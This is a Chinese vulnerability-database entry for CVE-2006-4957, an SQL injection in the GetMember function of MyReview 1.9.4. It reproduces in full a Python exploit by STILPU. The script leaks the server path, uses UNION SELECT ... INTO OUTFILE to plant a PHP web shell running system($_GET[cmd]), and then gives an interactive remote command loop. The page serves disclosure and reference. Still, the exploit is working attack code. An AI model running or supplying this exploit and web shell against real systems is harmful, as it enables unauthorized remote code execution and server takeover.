投稿
https://www.exploit-db.com/exploits/2397
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-398
MyReview 'functions.php' SQL注入漏洞
| 漏洞ID | 1111078 | 漏洞类型 | SQL注入 |
| 发布时间 | 2006-09-19 | 更新时间 | 2006-09-25 |
 CVE编号
|
CVE-2006-4957 |  CNNVD-ID
|
CNNVD-200609-398 |
| 漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
MyReview1.9.4的functions.php中GetMember函数内存在SQL注入漏洞,远程攻击者可以通过Admin.php的email参数执行任意SQL命令。
|漏洞EXP
# MyReview 1.9.4 SQL Injection exploit
#
#
# http://myreview.lri.fr/
#
# in functions.php starting from line 382
# ............
# function GetMember ($email, $db, $mode="array")
# {
# $query = "SELECT * FROM PCMember WHERE email = '$email'" ;
# result = $db->execRequete ($query);
# ..........
#
# $email is not checked before used into $query
#
# for patch
#
# 1. add "$email=addslashes(trim($email));" before $query
# 2. use something else, very buggy script
#
# by STILPU (dmooray[a lu']gmail.com)
#
import httplib, urllib, re, urlparse, sys
def usage():
print """
MyReview 1.9.4 SQL Injection exploit
Usage: python exploit.py http://target/pathtomyreview/
Requires warnings to be displayed so we cat get the localpath and FILES/ to be writable
by STILPU (dmooray[a lu']gmail.com)
"""
sys.exit(1)
def getlocalpath(server):
params=urllib.urlencode({'email':'\'','motDePasse':'a','ident':'Log in'})
headers={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
con = httplib.HTTPConnection(server)
con.request("POST",path+"Admin.php",params,headers)
resp=con.getresponse()
data=resp.read()
try:
localpath=re.search('>/.*B',data[0:10000]).group().replace('>','',1).replace('B','',1)
except Exception: print "Exploit failed: didn`t manage to get localpath"; sys.exit(1)
return localpath
def sendshell(server):
shell="'<?php error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); /*'"
sql="' union select " + shell + ",0,0,0,'*/ ?>' into outfile '" +getlocalpath(server)+ "FILES/STILPU.php' from PCMember#"
headers={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
params=urllib.urlencode({'email':sql,'motDePasse':'a','ident':'Log in'})
con = httplib.HTTPConnection(server)
con.request("POST",path+"Admin.php",params,headers)
def sendcmd(server):
while 1:
try:
cmd=raw_input('sh$ ')
cmd=cmd.replace(" ","+")
con = httplib.HTTPConnection(target)
con.request("GET",path+"FILES/STILPU.php?cmd="+cmd)
resp=con.getresponse()
data=resp.read()
if (cmd=="exit" or cmd=="quit"): break
print data
except KeyboardInterrupt: break
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
else:
url = sys.argv[1]
url = urlparse.urlsplit(url)
target = url[1]
path = url[2]
sendshell(target)
sendcmd(target)
# milw0rm.com [2006-09-19]|参考资料
来源:XF
名称:myreview-functions-sql-injection(29029)
链接:http://xforce.iss.net/xforce/xfdb/29029
来源:BID
名称:20105
链接:http://www.securityfocus.com/bid/20105
来源:VUPEN
名称:ADV-2006-3716
链接:http://www.frsirt.com/english/advisories/2006/3716
来源:SECUNIA
名称:21991
链接:http://secunia.com/advisories/21991
来源:MILW0RM
名称:2397
链接:http://milw0rm.com/exploits/2397
检索漏洞
开始时间
结束时间